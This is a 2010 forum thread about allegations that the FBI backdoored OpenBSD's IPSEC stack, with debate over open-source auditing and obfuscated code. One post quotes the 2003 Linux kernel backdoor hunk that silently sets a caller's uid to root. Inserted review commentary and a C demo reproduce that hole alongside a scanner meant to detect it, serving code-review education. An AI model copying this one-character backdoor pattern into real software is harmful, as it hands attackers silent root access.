# FBI Alleged To Have Backdoored OpenBSD's IPSEC Stack



## UNIXgod (Dec 15, 2010)

wow

http://marc.info/?l=openbsd-tech&m=129236621626462&w=2

I wonder if this affects us as well?


----------



## rbelk (Dec 15, 2010)

I often wondered why the FBI wanted people to use OpenBSD as their Firewall/VPN system.


----------



## nekoexmachina (Dec 15, 2010)

Who can tell you no FreeBSD guys have done the same thing?
The Linux ones? NetBSD?
The only non-affected system could be, err, Plan 9, just because of its popularity


----------



## qsecofr (Dec 15, 2010)

One of the great selling points of open source software is that the code is public, it's viewed, reviewed, and audited by any number of persons, and theoretically such a backdoor couldn't conceivably exist (for 10 years!).  My guess is Theo panicked by writing such an email.  Or did he?  I'd have expected a GPG-signed email.  Anyway the burden is probably on the OpenBSD team to prove their product is secure by default, not those being accused.  Loss of confidence in any cryptographic algorithm could have real bad consequences world-wide.


----------



## nekoexmachina (Dec 15, 2010)

> that the code is public,


And could be obfuscated enough to put there some code you would not want to run.


----------



## fender0107401 (Dec 15, 2010)

*Seems OpenBSD IPSEC is backdoored, how about FreeBSD?*

[ threads merged - Mod ]


----------



## lomsky (Dec 15, 2010)

It's not confirmed yet by the OpenBSD maintainers, but they are still in the process of auditing the IPSEC stack. You can check the IPSEC stack here http://bit.ly/dSs4vV. Based on that email, the location is in the stack vector, so in FreeBSD the stack vector is here http://bit.ly/dUTiiu and it seems that those sources are different. But that's only based on the email, which says that the backdoor is in the IPSEC stack.


----------



## kpedersen (Dec 15, 2010)

I would like to believe that no obfuscated code lives in the *BSD codebase 

... right guys... ?


----------



## graudeejs (Dec 15, 2010)

read comments on http://www.osnews.com/story/24136/_FBI_Added_Secret_Backdoors_to_OpenBSD_IPSEC_

In one comment I saw this: http://cm.bell-labs.com/who/ken/trust.html


----------



## overmind (Dec 15, 2010)

*Backdoors in IPSEC?*

Here is the story:

http://gizmodo.com/5713735/how-the-fbi-planted-backdoors-in-secure-communication-protocols

Don't know if is true.


----------



## DutchDaemon (Dec 15, 2010)

Can people stop opening new topics for this? Thanks


----------



## adamk (Dec 15, 2010)

qsecofr said:

> My guess is Theo panicked by writing such an email.



I doubt that very much. He probably wrote the e-mail because he knew that if he didn't, and someone came forward publicly, making those same claims, and saying that they had already notified Theo, everyone would accuse him of trying to cover it up.

Adam


----------



## DutchDaemon (Dec 15, 2010)

Exactly. Treat it like 'any other bug' and fess up. Simple as that.


----------



## anomie (Dec 15, 2010)

nekoexmachina said:

> And could be obfuscated enough to put there some code you would not want to run.



Not to belabor this point too much, but it's exactly right. Even Bourne shell scripts can be obfuscated to the extent that they're almost impossible for a human to interpret. (Seriously - I've inherited some wonderful examples.) Imagine the type of crud you can mask in complex C code.


----------



## graudeejs (Dec 15, 2010)

anomie said:

> Not to belabor this point too much, but it's exactly right. Even Bourne shell scripts can be obfuscated to the extent that they're almost impossible for a human to interpret. (Seriously - I've inherited some wonderful examples.) Imagine the type of crud you can mask in complex C code.



Yeah, I've seen an sh script (and a howto, for that matter [don't have the link any more]) that was obscured asm code


----------



## UNIXgod (Dec 15, 2010)

Bounties are being set up now:

http://maycontaintracesofbolts.blogspot.com/2010/12/openbsd-ipsec-backdoor-allegations.html


----------



## vdvluc (Dec 15, 2010)

Mail from Perry:
http://blogs.csoonline.com/1296/an_fbi_backdoor_in_openbsd


----------



## Alt (Dec 16, 2010)

qsecofr said:

> One of the great selling points of open source software is that the code is public, it's viewed, reviewed, and audited by any number of persons


It CAN be audited, but..
For example, this Linux backdoor attempt was almost done in 2003. This patch was dropped because of a signature mismatch, but what if a committer can approve this?

```
+       if ((options == (__WCLONE|__WALL)) && (current->uid = 0))
+                       retval = -EINVAL;
```
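Review bot: the right operand of `&&` in this hunk is an assignment, `(current->uid = 0)`, not the comparison `current->uid == 0` that the surrounding check implies. For a caller passing exactly `__WCLONE|__WALL` it overwrites the task's uid with 0 (root) and then evaluates to 0, so `retval = -EINVAL` is never reached and the call returns as if nothing happened. The extra parentheses around the assignment are what keep `-Wparentheses` quiet, so the compiler gives no hint. Suggest `(current->uid == 0)`, and treat any bare `=` inside a condition in a diff as a review blocker.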
This is a backdoor and it differs from normal code by 1 byte. Sure it can be viewed, reviewed, and audited by any number of persons, but...
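The one-byte difference Alt points at is worth seeing run. The following C program is an added example for this thread, not code from the Linux kernel or from any poster: it models the posted condition with a constructed `struct task` and stand-in flag values, puts the backdoored form beside the intended comparison, and adds a deliberately small heuristic scanner (`assignments_in_if_condition`, an assumed name) of the kind a code-auditing tool would run over a diff to flag a bare assignment inside an `if` condition. Every name other than those in the posted snippet is an assumption.

```c
#include <stdio.h>
#include <string.h>

/* Stand-ins for the kernel definitions the snippet refers to (constructed for
 * this demo; the values mirror Linux's wait4 flags but nothing here is kernel code). */
#ifndef __WCLONE
#define __WCLONE 0x80000000u
#endif
#ifndef __WALL
#define __WALL   0x40000000u
#endif
#define EINVAL_DEMO 22

/* Minimal stand-in for the task struct: only the field the backdoor touches. */
struct task { unsigned int uid; };

/* The 2003 attempt as posted: '=' where '==' was intended. The assignment sits
 * in its own parentheses, so -Wparentheses stays silent. When options matches,
 * uid is overwritten with 0 (root) and the expression evaluates to 0, so retval
 * is never set and the caller sees no error. */
long wait_check_backdoored(unsigned int options, struct task *current)
{
    long retval = 0;
    if ((options == (__WCLONE|__WALL)) && (current->uid = 0))
        retval = -EINVAL_DEMO;
    return retval;
}

/* What a reviewer would expect: compare, never assign, inside the condition. */
long wait_check_correct(unsigned int options, struct task *current)
{
    long retval = 0;
    if ((options == (__WCLONE|__WALL)) && (current->uid == 0))
        retval = -EINVAL_DEMO;
    return retval;
}

/* Demo helpers: run one check on a fresh task and report what it left behind. */
unsigned int uid_after(long (*check)(unsigned int, struct task *),
                       unsigned int options, unsigned int uid)
{
    struct task t = { uid };
    check(options, &t);
    return t.uid;
}

long retval_of(long (*check)(unsigned int, struct task *),
               unsigned int options, unsigned int uid)
{
    struct task t = { uid };
    return check(options, &t);
}

/* Heuristic audit check (constructed, not a real linter): count bare '='
 * assignments inside the parentheses of an "if (...)" on one source line,
 * ignoring ==, !=, <= and >=. One hit on a one-byte diff like the above is
 * exactly what a review tool should hand to a human. */
int assignments_in_if_condition(const char *line)
{
    const char *p = strstr(line, "if");
    if (p == NULL)
        return 0;
    p = strchr(p, '(');
    if (p == NULL)
        return 0;
    int depth = 0, count = 0;
    for (; *p; p++) {
        if (*p == '(') {
            depth++;
        } else if (*p == ')') {
            if (--depth == 0)
                break;              /* end of the if condition */
        } else if (*p == '=') {
            if (p[1] == '=') {      /* "==": skip both characters */
                p++;
                continue;
            }
            char prev = p[-1];      /* safe: a '(' precedes any '=' here */
            if (prev == '!' || prev == '<' || prev == '>')
                continue;           /* !=, <=, >= */
            count++;
        }
    }
    return count;
}

int main(void)
{
    unsigned int match = __WCLONE | __WALL;
    printf("backdoored: retval=%ld uid=%u (was 1000)\n",
           retval_of(wait_check_backdoored, match, 1000),
           uid_after(wait_check_backdoored, match, 1000));
    printf("correct:    retval=%ld uid=%u\n",
           retval_of(wait_check_correct, match, 1000),
           uid_after(wait_check_correct, match, 1000));
    const char *hunk = "if ((options == (__WCLONE|__WALL)) && (current->uid = 0))";
    printf("audit hits on posted line: %d\n", assignments_in_if_condition(hunk));
    return 0;
}
```

Build with `cc -Wall -Wextra demo.c` and note that no warning appears: GCC's `-Wparentheses` only complains about an assignment used as a truth value when it is not already parenthesized, and the extra parentheses in the posted line are exactly what silence it. The scanner reports the line anyway, which is the point of running a dumb textual check on every diff in addition to the compiler.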


----------



## qsecofr (Dec 18, 2010)

I may have an interpretation of "audit" that is all my own then. I'd like to think that not only is the code audited for bugs, but it is audited for achieving its purpose.

Not to say that mistakes can't be made. It's the nature of the business. In which case find/fix/patch followed by a security advisory seems appropriate.. Once proven found, that is.

Dishonesty among committers seems more an organizational & operational issue. More stringent auditing might help deter that.

Regarding the original external link, I still think it's OpenBSD's responsibility to protect their brand. The suggestion that the accused should somehow prove their innocence seems an abdication of responsibility in my opinion. In my ignorance I don't really know if Theo represents the OpenBSD team in any capacity. But if so, I'd suggest PGP-signed emails if sent as official communications of the group.

Trust will probably become one of the big issues in IT.  If it isn't already.  I mean with all the spam, I don't even trust emails from my own mother unless they're PGP-signed.


----------



## SENECA (Dec 19, 2010)

*Report of FBI back door roils OpenBSD community.*

Hello everyone.

First of all wish you a Merry Christmas and a Happy New Year.

A couple of days ago I came across this news in an IT forum (Informatica), and I threw my hands up in despair.

Source: http://news.cnet.com/8301-31921_3-20025767-281.html?tag=topStories1

OpenBSD (an open source operating system with backdoors).
I know that OpenBSD and FreeBSD are not the same, but ...
What do you think about it?
Would something similar be possible in FreeBSD?
Is there no one monitoring the source code?



Thanks for your time.

Bye bye.

P. S. Presuppose the truth of the assertion of the existence of those backdoors.


----------



## DutchDaemon (Dec 19, 2010)

Again: can people stop opening new topics for this? Thanks..


----------



## bes (Dec 21, 2010)

Gregory Perry - John Young correspondence published on Cryptome.org


----------



## lockfile (Dec 30, 2010)

bes said:

> Gregory Perry - John Young correspondence published on Cryptome.org




Wow that post was a trip. Especially this link: http://mickey.lucifier.net/b4ckd00r.html . That is the exact stuff conspiracy theories are made of. Where is the tin-foil hat smilie? An OpenBSD hacker was talking about intelligence agents from the Navy and FBI telling him to keep his mouth shut over OpenBSD. This stuff has been going on since early '90s! Incredible. 

Well obviously there are "feds in your systems." 

Privacy is important. Also, catching tourists is important too, but citizens civil (and human) right to privacy is of higher priority than catching tourists.

Firstly, I say we use the nature of open source software to uproot them from our systems. We need to do a full code audit of the secure kernel.

Secondly, strict coding and format rules should be devised so as to prevent the insertion of obfuscated code. Coding standards exist for most free software projects today, but this special set of rules would be structured in such a way as to highlight "devious and obfuscated code", or code that does not make it obvious what it is doing.

Thirdly, we have a "chieftain" or "a roundtable of chieftains" that are switched yearly to review each and every piece of code on a certain part of the system: core of the kernel, networking, IPSEC stuff, etc. Debates, investigations, and discussions will be had before any suspected code is let loose.

Fourthly, I say a website be created that scrolls recently added code on a screen for at least 3 months. Then each day, a piece of code is picked from the screen and inspected for nefariousness.

Fifthly, create a code auditing suite of analysis apps that find obfuscated code, or code that is suspected of being obfuscated. Data analysis is being applied to everything today. Why not apply it to some C files?


----------



## Alt (Jan 4, 2011)

lockfile, this will not help against the FBI. They are way more powerful than you can imagine..


----------



## lockfile (Jan 4, 2011)

Alt said:

> lockfile, this will not help against the FBI. They are way more powerful than you can imagine..



Yes you are right. The FBI should be looking out for Americans' interests, not suppressing them. 

I recently read that your PM Putin just ordered the government to put critical systems on Linux. I was surprised to hear that they were not already! That is good news.


----------

